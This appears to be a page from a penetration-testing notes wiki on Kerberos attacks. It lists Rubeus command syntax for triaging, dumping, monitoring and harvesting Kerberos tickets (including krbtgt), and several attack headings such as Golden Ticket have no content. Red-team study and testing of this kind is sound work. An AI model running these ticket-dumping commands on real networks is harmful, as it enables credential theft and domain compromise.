Kerberos Attacks

Get sid:

whoami /user

SID: S-1-5-21-2536614405-3629634762-1218571035-1116 domain SID = S-1-5-21-2536614405-3629634762-1218571035 Domain object = 1116

Rubeus

.\Rubeus.exe traige
.\Rubeus dump

Ticket enumeration

# Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service:
Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]

#List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:
Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]

#Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID:
Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap
   
#Monitor every /interval SECONDS (default 60) for new TGTs:
Rubeus.exe monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]

#Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working cache every /displayinterval SECONDS (default 1200):
Rubeus.exe harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]

Mimikatz

Ticket enumeration

Pass-The-Hash

Silver Ticket attack

Golden Ticket Attack

Cache tickets

Set the TGT for impacket use

Kirbi tickets

PreviousDomain ExploitationNextSCCM

Last updated